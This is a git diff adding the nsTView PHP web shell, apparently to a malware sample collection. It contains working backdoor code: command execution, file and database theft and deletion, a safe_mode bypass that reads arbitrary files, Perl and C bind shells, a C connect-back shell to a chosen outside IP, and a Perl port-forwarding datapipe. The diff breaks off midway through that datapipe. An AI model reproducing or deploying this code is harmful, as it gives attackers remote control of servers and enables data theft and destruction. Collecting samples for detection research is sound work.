    + + + + diff --git a/PHP/Backdoor.PHP.Nst.e b/PHP/Backdoor.PHP.Nst.e new file mode 100644 index 00000000..2b758e3a --- /dev/null +++ b/PHP/Backdoor.PHP.Nst.e @@ -0,0 +1,2136 @@ +nsTView $ver:: nst.void.ru +
    +
    +
    +nsTView $ver :: nst.void.ru
    +
    +
    +Password:
    + +
    +Host: ".$_SERVER["HTTP_HOST"]."
    +IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
    +Your ip: ".$ip." +
    +");} + +} +$d=$_GET['d']; + +function adds($editf){ +#if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +#} +return $editf; +} +function adds2($editf){ +if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +} +return $editf; +} + +$f = "nst_sql.txt"; +$f_d = $_GET['f_d']; + +if($_GET['download']){ +$download=$_GET['download']; +header("Content-disposition: attachment; filename=\"$download\";"); +readfile("$d/$download"); +exit;} + +if($_GET['dump_download']){ +header("Content-disposition: attachment; filename=\"$f\";"); +header("Content-length: ".filesize($f_d."/".$f)); +header("Expires: 0"); +readfile($f_d."/".$f); +if(is_writable($f_d."/".$f)){ +unlink($f_d."/".$f); +} +die; +} + + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "
    nsTView $ver
    o... Network security team ...o
    "; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); +if(@$_GET['p']=="info"){ +@phpinfo(); +exit;} +if(@$_GET['img']=="1"){ +@$e=$_GET['e']; +header("Content-type: image/gif"); +readfile("$d/$e"); +} +if(@$_GET['getdb']=="1"){ +header('Content-type: application/plain-text'); +header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); +} +print "nsT View $ver + + +"; +print " + +"; +if($os=="unix"){ echo " + +";} echo" + +"; +if($os=="win"){ echo " +";}else{echo "";} +print ""; + + + + + +if($_GET['p']=="ftp"){ +print "
    0"; +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "/";} +else{ + echo "$expl[0]/";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="$expl[$i]/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'>/","/'>",$sls); +print $sls; +} +if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} +if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} +echo "
    id: ".@exec('id')."
    uname -a: ".@exec('uname -a')."
    Your IP: [$ip] Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."] Server H.D.: [".$_SERVER["HTTP_HOST"]."]
    +[Safe mode: $safe_m] [Register globals: $reg_g]
    +[Back] +[Home] +[Shell (1) (2)] +[Upload] +[Tools] +[PHPinfo] +[DEL Folder] +[SQL] +[Self Remover] +
    +
    < +A +B +C +D +E +F +G +H +I +J +K +L +M +N +O +P +Q +R +S +T +U +V +W +X +Y +Z +
     
    +:: Create folder :: +Create file :: +Read file if safe mode is On ::"; +if($os=="unix"){ +print "PS table ::"; +} +print "
    "; + + + +print "
    "; +print $copyr; +exit; +} + + + + + + + + + + +if(@$_GET['p']=="sql"){ +print ""; +### + +$f_d = $_GET['f_d']; +if(!isset($f_d)){$f_d=".";} +if($f_d==""){$f_d=".";} + +$php_self=$_SERVER['PHP_SELF']; +$delete_table=$_GET['delete_table']; +$tbl=$_GET['tbl']; +$from=$_GET['from']; +$to=$_GET['to']; +$adress=$_POST['adress']; +$port=$_POST['port']; +$login=$_POST['login']; +$pass=$_POST['pass']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +$conn=$_GET['conn']; +if(!isset($adress)){$adress="localhost";} +if(!isset($login)){$login="root";} +if(!isset($pass)){$pass="";} +if(!isset($port)){$port="3306";} +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} + + +?> + + + + + + + + + + + +
    Address:
    Login:
    Pass:
    PHP v".@phpversion()."
    mySQL v".@mysql_get_server_info()."
    ";}?>
    + + + +Error: ".mysql_error()."
    "); +if($serv){$status="Connected. :: Log out";}else{$status="Disconnected.";} +print "Status: $status

    "; # #D7FFA8 +print "
    "; +print "
    [db]
    "; +print ""; +$res = mysql_list_dbs($serv); +while ($str=mysql_fetch_row($res)){ +print "[DEL][DUMP] $str[0]
    "; +$tc++; +} +$baza=$_GET['baza']; +$db=$_GET['db']; +print "[Total db: $tc]
    "; +if($baza){ +print "
    db: [$db]

    "; +$result=@mysql_list_tables($db); +while($str=@mysql_fetch_array($result)){ +$c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); +$records=mysql_fetch_array($c); + +if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} +if($records[0]=="0"){ +print "[D][R][$records[0]] $str[0]
    "; +}else{ +print "[D][R][$records[0]] $str[0]
    "; +} +mysql_free_result($c); +$total_t++; +} +print "
    Total tables: $total_t"; + print "
    ";
    +for($i=0; $i<$s4ot+10; $i++){print " ";}
    +                                print "
    "; +} #end baza + + + + +# delete table +if(isset($delete_table)){ +mysql_select_db($_GET['db']) or die("".mysql_error().""); +mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error().""); +print "
    Table [ $delete_table ] :: Deleted success!"; +print ""; +} +# end of delete table + +# delete database +if(isset($_GET['delete_db'])){ +mysql_drop_db($_GET['delete_db']) or die("".mysql_error().""); +print "
    Database ".$_GET['delete_db']." :: Deleted Success!"; +print ""; +} +# end of delete database + +# delete row +if(isset($_POST['delete_row'])){ +$_POST['delete_row'] = base64_decode($_POST['delete_row']); +mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error().""); +$del_result = "
    Deleted Success!
    ".$_POST['delete_row']; +print ""; +} +# end of delete row + + +$vn=$_GET['vn']; +print "
    "; +print "Database: $db => $vn"; + +# edit row +if(isset($_POST['edit_row'])){ +$edit_row=base64_decode($_POST['edit_row']); + +$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error().""); +print "

    + + "; +print ""; +print ""; +print " Update
    + Insert new

    "; + + +$i=0; +while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ +foreach($mn as $key =>$val){ +$type = mysql_field_type($r_edit, $i); +$len = mysql_field_len($r_edit, $i); +$del .= "`$key`='".adds($val)."' AND "; +$c=strlen($val); +$val=htmlspecialchars($val, ENT_NOQUOTES); +$str=" "; +$buff .= ""; +$i++; +} + +} +$delstring=base64_encode($del); +print ""; +print "$buff
    RowValue
    $key
    ($type($len))
    $str

    "; +print "
    "; +if(!$_POST['makeupdate']){print "";} + + + + +if($_POST['makeupdate']){ +if($_POST['upd']=='update'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $iPHP var:
    \$sql=\"$up_string\";

    "; +print ""; +mysql_query($up_string) or die("".mysql_error().""); +}#end of make update + + + +if($_POST['upd']=='insert'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i".mysql_error().""); +print "PHP var:
    \$sql=\"$make_insert\";

    "; +print ""; +}#end of insert +}#end of update +} +# end of edit row + + +# insert new line +if($_GET['ins_new_line']){ +$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error().""); +print "
    +Insert new line in $tbl table

    "; +print ""; +while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { +foreach ($new_line as $key =>$next) { +$buff .= "$next "; +} +$expl=explode(" ",$buff); +$buff2 .= $expl[0]." "; +print " +"; +unset($buff); +} +print "
    $expl[0]
    ($expl[1])
    +
    +
    "; +if($_POST['mk_ins']){ +preg_match_all("/(.*?)\s/i",$buff2,$matches3); +for($i=0; $i".mysql_error().""); +print "PHP var:
    \$sql=\"$make_insert\";

    "; +print ""; +}#end of mk ins +}#end of ins new line + + + + + + +if(isset($_GET['rename_table'])){ +$rename_table=$_GET['rename_table']; +print "

    Rename $rename_table to

    +
    +

    +
    +
    +"; + +if(isset($_POST['new_name'])){ +mysql_select_db($db) or die("".mysql_error().""); +mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error().""); +print "
    Table $rename_table renamed to ".$_POST['new_name'].""; +print ""; +} + +}#end of rename + + +# dump table +if($_GET['dump']){ +if(!is_writable($f_d)){die("

    This folder $f_d isnt writable!
    Cannot make dump.

    +You can change temp folder for dump file in your browser!
    +Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
    +Then press enter
    +
    ");} +mysql_select_db($db) or die("".mysql_error().""); +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) Table ( $tbl ) +# --- eof --- + +"); +$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error().""); +$row = mysql_fetch_row($que); +fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n"); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$que = mysql_query("SELECT * FROM `$tbl`"); +if(mysql_num_rows($que)>0){ +while($row = mysql_fetch_assoc($que)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; +fwrite($fp, $sql); +} +} +fclose($fp); +print ""; +}#end of dump + + + + +# db dump +if($_GET['dump_db']){ +$c=mysql_num_rows(mysql_list_tables($db)); +if($c>=1){ +print "

       Dump database $db"; +}else{ +print "

    Cannot dump database. No tables exists in $db db."; +die; +} +if(sizeof($tabs)==0){ +$res = mysql_query("SHOW TABLES FROM $db"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_row($res)){ +$tabs[] .= $row[0]; +} +} +} +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) +# --- eof --- + +"); +foreach($tabs as $tab) { +fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n"); +$res = mysql_query("SHOW CREATE TABLE `$tab`"); +$row = mysql_fetch_row($res); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$res = mysql_query("SELECT * FROM `$tab`"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_assoc($res)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = join("', '", $values); +$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n"; +fwrite($fp, $sql); +}} +fwrite($fp, "\r\n\r\n\r\n"); +} +fclose($fp); +print ""; +}#end of db dump + + + + + + +$vnutr=$_GET['vnutr']; +$tbl=$_GET['tbl']; +if($vnutr and !$_GET['ins_new_line']){ +print "
    "; + +mysql_select_db($db) or die(mysql_error()); +$c=mysql_query ("SELECT COUNT(*) FROM $tbl"); +$cfa=mysql_fetch_array($c); +mysql_free_result($c); +print " +Total: $cfa[0] +
    +From: +To: + + + + + + + + + + + + [DOWNLOAD] [INSERT] [DUMP] +
    "; +$vn=$_GET['vn']; +$from=$_GET['from']; +$to=$_GET['to']; +$from=$_GET['from']; +$to=$_GET['to']; +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +$query = "SELECT * FROM $vn LIMIT $from,$to"; +$result = mysql_query($query); +$result1= mysql_query($query); +print $del_result; +print ""; +for ($i=0;$i $name ($type($len))"; +} +print "
    ";
    +
    +while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
    +foreach($mn as $key=>$inside){
    +$buffer1 .= "`$key`='".adds($inside)."' AND ";
    +$b1 .= "
    "; +} +$buffer1 = substr($buffer1, 0, strlen($buffer1)-5); +$buffer1 = base64_encode($buffer1); +print "\r\n"; +print $b1; +print ""; +unset($b1); +unset($buffer1); +} + + + +mysql_free_result($result); +print "
    ".htmlspecialchars($inside, ENT_NOQUOTES)."  +
    + + +
    + + +
    +
    "; +} #end vnutr +print "
    "; +} # end $conn + + +### end of sql +print " "; +print $copyr; +die; +} + + +@$p=$_GET['p']; +if(@$_GET['p']=="selfremover"){ + print ""; +print "Are you sure?
    +Yes | No
    +Remove: "; +$path=__FILE__; +print $path; +print " ?"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="NOT DELETED!!!"; +print "FILE $path NOT DELETED"; +}else{$hmm="DELETED";} +print ""; + +} + + + +if($os=="unix"){ +function fastcmd(){ +global $fast_commands; +$c_f=explode("\n",$fast_commands); +$c_f=count($c_f)-2; +print " +
    +Total commands: $c_f
    +
    + +
    +"; +} +}#end of os unix + + +if($os=="win"){ +function fastcmd(){ +global $fast_commands_win; +$c_f=explode("\n",$fast_commands_win); +$c_f=count($c_f)-2; +print " +
    +Total commands: $c_f
    +
    + +
    +"; +} +}#end of os win + + +echo " +"; +if(@$_GET['sh311']=="1"){echo "
    cmd
    pwd: +"; +chdir($d); +echo getcwd()."

    +Fast cmd:
    "; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +Insert pwd +

    +"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "
    ";
    +print `$sh3`;
    +echo "
    "; +} +} + +if(@$_GET['sh311']=="2"){ +echo "
    cmd
    +pwd: +"; +chdir($d); +echo getcwd()."

    +Fast cmd:
    "; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +Insert pwd +

    "; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "
    "; print `$sh3`; echo "
    ";} +echo $copyr; +exit;} + +if(@$_GET['delfl']){ +@$delfolder=$_GET['delfolder']; +echo "DELETE FOLDER: ".@$_GET['delfolder']."
    +(All files must be writable)
    +Yes || No

    +"; +echo $copyr; +exit; +} + + +$mkdir=$_GET['mkdir']; +if($mkdir){ +print "
    Create Folder in $d :

    +
    +New folder name:
    + +

    +"; +if($_POST['dir_n']){ +mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); +print "Directory created success!"; +} +print $copyr; +die; +} + + +$mkfile=$_GET['mkfile']; +if($mkfile){ +print "
    Create file in $d :

    +
    +File name:
    +(example: hello.txt , hello.php)
    + +

    +"; +if($_POST['file_n']){ +$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); +fwrite($fp,""); +print "File created success!"; +} +print $copyr; +die; +} + + +$ps_table=$_GET['ps_table']; +if($ps_table){ + +if($_POST['kill_p']){ +exec("kill -9 ".$_POST['kill_p']); +} + +$str=`ps aux`; + +# You can put here preg_match_all for other distrib/os +preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches); + + +print "
    PS Table :: Fast kill program
    +(p.s: Tested on Linux slackware 10.0)
    +
    "; +print "
    "; +for($i=0; $i"; +}#end of for +print "
    $expl[0]PID: ".$matches[1][$i]." :: ".$matches[3][$i]."
    Kill:


    "; +unset($str); +print $copyr; +die; +}#end of ps table + + +$read_file_safe_mode=$_GET['read_file_safe_mode']; +if($read_file_safe_mode){ + +if(!isset($_POST['l'])){$_POST['l']="root";} + +print "
    +Read file content using MySQL - when safe_mode, open_basedir is ON
    +
    + + + +
    Addr:
    Login:
    Passw:
    +(example: /etc/hosts)
    +
    + +
    +
    "; + +if($_POST['read_file']){ +$read_file=$_POST['read_file']; +@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error().""); +mysql_create_db("tmp_bd_file") or die("".mysql_error().""); +mysql_select_db("tmp_bd_file") or die("".mysql_error().""); +mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error().""); +mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file"); +$query = "SELECT * FROM tmp_file"; +$result = mysql_query($query) or die("".mysql_error().""); +print "File content:

    "; +for($i=0;$i$col_value) { +print htmlspecialchars($col_value)."
    ";}} +mysql_free_result($result); +mysql_drop_db("tmp_bd_file") or die("".mysql_error().""); +} + + +print $copyr; +die; +}#end of read_file_safe_mode + + +# sys +$wich_f=$_GET['wich_f']; +$delete=$_GET['delete']; +$del_f=$_GET['del_f']; +$chmod=$_GET['chmod']; +$ccopy_to=$_GET['ccopy_to']; + + +# delete +if(@$_GET['del_f']){ +if(!isset($delete)){ +print "Delete this file?
    +$d/$wich_f

    +Yes / No +";} +if($delete==1){ +unlink($d."/".$del_f); +print "File: $d/$del_f DELETED! +
    # BACK +"; +} +echo $copyr; +exit; +} + + +# copy to +if($ccopy_to){ +$wich_f=$_POST['wich_f']; +$to_f=$_POST['to_f']; +print "Copy file:
    +$d/$ccopy_to

    +
    +
    +File:


    +To:


    +


    +"; + +if($to_f){ +@copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable"); +print "Copy success!!!
    "; +} + +echo $copyr; +exit; +} + + +# chmod +if(@$_GET['chmod']){ +$perms = @fileperms($d."/".$wich_f); +print "CHMOD file $d/$wich_f
    +
    This file chmod is "; +print perm($perms); +print "
    +
    "; +$chmd=<< + + + + + +
    +

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    CHMOD (File Permissions)
    PermissionOwnerGroupOther
    Read
    Write
    Execute
    Octal:=
    Symbolic:=

    +HTML; + +print "
    ".$chmd." + +$d/$wich_f

    + +
    + +"; +$t_total=$_POST['t_total']; +if($t_total){ +chmod($d."/".$wich_f,$t_total); +print "

    Now chmod is $t_total

    "; +print "# BACK

    "; +} +echo $copyr; +exit; +} + +# rename +if(@$_GET['rename']){ +print "RENAME $d/$wich_f ?

    +
    +
    +RENAME
    $wich_f

    TO
    +

    + +
    +"; + +@$rto=$_POST['rto']; + +if($rto){ +$fr1=$d."/".$wich_f; +$fr1=str_replace("//","/",$fr1); +$to1=$d."/".$rto; +$to1=str_replace("//","/",$to1); + +rename($fr1,$to1); +print "File
    $wich_f
    Renamed to $rto

    "; + +echo ""; + +} + +echo $copyr; +exit; +} + + + + +if(@$_GET['deldir']){ +@$dir=$_GET['dir']; +function deldir($dir) +{ +$handle = @opendir($dir); +while (false!==($ff = @readdir($handle))){ +if($ff != "." && $ff != ".."){ +if(@is_dir("$dir/$ff")){ +deldir("$dir/$ff"); +}else{ +@unlink("$dir/$ff"); +}}} +@closedir($handle); +if(@rmdir($dir)){ +@$success = true;} +return @$success; +} +$dir=@$dir; +deldir($dir); + +$rback=$_GET['rback']; +@$rback=explode("/",$rback); +$crb=count($rback); +for($i=0; $i<$crb-1; $i++){ + @$x.=$rback[$i]."/"; +} +echo ""; +echo $copyr; +exit;} + + +if(@$_GET['t']=="tools"){ + # unix +if($os=="unix"){ +print " +

    +P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.
    + + + + + + + + +
    [Name][C][Port][Perl][Port][Other options, info]
    Backdoor:
    none
    Back connect:b.c. ip: nc -l -p 5546
    Datapipe:other serv ip: port:
    Web proxy:
    none
    Socks 4 serv:none
    Socks 5 serv:none
    +
    +

    +"; +}#end of unix + + +if($_POST['perl_bd']){ +$port=$_POST['port']; +$perl_bd_scp = " +use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); +setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); +listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} +open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); +close X;}}"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl /tmp/nst_perl_bd.pl &"); +unlink("/tmp/nst_perl_bd.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); +fwrite($fp,"$perl_bd_scp"); +passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &"); +unlink(".nst_bd_tmp/nst_perl_bd.pl"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of start perl_bd + +if($_POST['perl_proxy']){ +$port=$_POST['port']; +$perl_proxy_scp = ""; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl /tmp/nst_perl_proxy.pl $port &"); +unlink("/tmp/nst_perl_proxy.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_proxy_tmp"); +$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w"); +fwrite($fp,base64_decode($perl_proxy_scp)); +passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &"); +unlink(".nst_proxy_tmp/nst_perl_proxy.pl"); +rmdir(".nst_proxy_tmp"); +} +} +$show_ps="1"; +}#end of start perl_proxy + +if($_POST['c_bd']){ +$port=$_POST['port']; +$c_bd_scp = "#define PORT $port +#include +#include +#include +#include +#include + +int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; +struct sockaddr_in serv_addr; +struct sockaddr_in client_addr; + +int main () +{ + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (soc_des == -1) + exit(-1); + bzero((char *) &serv_addr, sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(PORT); + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + signal(SIGHUP, SIG_IGN); + if (fork() != 0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + while (1) { + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + if (soc_cli < 0) + exit(0); + cli_pid = getpid(); + server_pid = fork(); + if (server_pid != 0) { + dup2(soc_cli,0); + dup2(soc_cli,1); + dup2(soc_cli,2); + execl(\"/bin/sh\",\"sh\",(char *)0); + close(soc_cli); + exit(0); + } + close(soc_cli); + } +} + +"; + + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd"); +passthru("nohup /tmp/nst_bd &"); +unlink("/tmp/nst_c_bd.c"); +unlink("/tmp/nst_bd"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bd_tmp"); +$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w"); +fwrite($fp,"$c_bd_scp"); +passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd"); +passthru("nohup .nst_bd_tmp/nst_bd &"); +unlink(".nst_bd_tmp/nst_bd"); +unlink(".nst_bd_tmp/nst_c_bd.c"); +rmdir(".nst_bd_tmp"); +} +} +$show_ps="1"; +}#end of c bd + + +if($_POST['bc_c']){ # nc -l -p 4500 +$port_c = $_POST['port_c']; +$ip=$_POST['ip']; +$bc_c_scp = "#include +#include +#include +#include +#include + +#include +#include + +int fd, sock; +int port = $port_c; +struct sockaddr_in addr; + +char mesg[] = \"::Connect-Back Backdoor:: CMD: \"; +char shell[] = \"/bin/sh\"; + +int main(int argc, char *argv[]) { + while(argc<2) { + fprintf(stderr, \" %s \", argv[0]); + exit(0); } + +addr.sin_family = AF_INET; +addr.sin_port = htons(port); +addr.sin_addr.s_addr = inet_addr(argv[1]); +fd = socket(AF_INET, SOCK_STREAM, 0); +connect(fd, (struct sockaddr*)&addr, sizeof(addr)); + +send(fd, mesg, sizeof(mesg), 0); + +dup2(fd, 0); +dup2(fd, 1); +dup2(fd, 2); +execl(shell, \"in.telnetd\", 0); + +close(fd); +return 1; +} + +"; + +if(is_writable("/tmp")){ +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");} +if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");} +$fp=fopen("/tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c"); +passthru("nohup /tmp/nst_bc_c $ip &"); +unlink("/tmp/nst_bc_c"); +unlink("/tmp/nst_bc_c.c"); +}else{ +if(is_writable(".")){ +mkdir(".nst_bc_c_tmp"); +$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w"); +$bd_c_scp=str_replace("!n","\n",$bd_c_scp); +fwrite($fp,"$bc_c_scp"); +passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c"); +passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &"); +unlink(".nst_bc_c_tmp/nst_bc_c.c"); +unlink(".nst_bc_c_tmp/nst_bc_c"); +rmdir(".nst_bc_c_tmp"); +} +} +$show_ps="1"; + +}#end of back connect C + + +if($_POST['datapipe_pl']){ +$port_2=$_POST['port_2']; +$port_3=$_POST['port_3']; +$ip=$_POST['ip']; +$datapipe_pl = " +#!/usr/bin/perl +# coded by CuTTer (rus hacker) +use IO::Socket; +use POSIX; + +\$localport=$port_2; +\$host=\"$ip\"; +\$port=$port_3; + +\$daemon=1; + +\$DIR = undef; + +## Âûâîäèòü ëî?ñîáûòè?(1-äà, 0-íå? +\$log=0; + + + + +\$| = 1; + +if (\$daemon){ + print \"3anycKaeM daemon\n\"; + + \$pid = fork; + exit if \$pid; + die \"Couldn't fork: \$!\" unless defined(\$pid); + POSIX::setsid() or die \"Can't start a new session: \$!\"; +} + +%o = ('port' => \$localport, + 'toport' => \$port, + 'tohost' => \$host); + +\$ah = IO::Socket::INET->new( + 'LocalPort' => \$localport, + 'Reuse' => 1, + 'Listen' => 10) + || die \"Íåëü? îòêðûò?ñîêå?äëÿ ñîåäèíåíèé: \$!\"; + +print \"Íà÷èíàåì âûïîëíåí? öèêë?\n\" if \$log; +\$SIG{'CHLD'} = 'IGNORE'; +\$num = 0; +while (1) { + \$ch = \$ah->accept(); + if (!\$ch) { + print STDERR \"Ïðåðâàíî âûïîëåíè?accept: \$!\n\"; + next; + } + + printf(\"Íîâû?êëèåíò: host %s, port %s.\n\", + \$ch->peerhost(), \$ch->peerport()) if \$log; + ++\$num; + \$pid = fork(); + if (!defined(\$pid)) { + print STDERR \"Íåâîçìîæíî âûïîëíèò?fork: \$!\n\"; + } elsif (\$pid == 0) { +## Íîâû?ïðîöåñ? + \$ah->close(); + Run(\%o, \$ch, \$num); + } else { + print \"Parent: Fork ïðîøåë óñïåøí? çàêðûâàå?ñîêå?\n\" if \$log; + \$ch->close(); + } +} + + +sub Run { + my(\$o, \$ch, \$num) = @_; + my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'}, + 'PeerPort' => \$o->{'toport'}); + print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log; + if (!\$th) { + printf STDERR (\"Child: Ïðåðâà?ðåäèðåêò íà %s, ïîðò %s.\n\", + \$o->{'tohost'}, \$o->{'toport'}); + exit 0; + } + + my \$fh; + if (\$o->{'dir'}) { + \$fh = Symbol::gensym(); + open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\") + or die \"Child: Ïðåðâàíî ñîçäàíèå ëî?ôàéë?\$o->{'dir'}/tunnel\$num.log: \$!\"; + } + + \$ch->autoflush(); + \$th->autoflush(); + while (\$ch || \$th) { + print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log; + my \$rin = \"\"; + vec(\$rin, fileno(\$ch), 1) = 1 if \$ch; + vec(\$rin, fileno(\$th), 1) = 1 if \$th; + my(\$rout, \$eout); + select(\$rout = \$rin, undef, \$eout = \$rin, 120); + if (!\$rout && !\$eout) { + print STDERR \"Child: Îøèáêà Timeout.\n\"; + } + my \$cbuffer = \"\"; + my \$tbuffer = \"\"; + + if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) { + print \"Child: Æäåì äàííûõ îò êëèåíò?\n\" if \$log; + my \$result = sysread(\$ch, \$tbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: Îøèáêà ïð?ñ÷èòûâàíèè äàííûõ êëèåíò? \$!\n\"; + exit 0; + } + if (\$result == 0) { + print \"Child: Êëèåíò îòñîåäèíèë?.\n\" if \$log; + exit 0; + } + + print \"Child: Äàííûå: 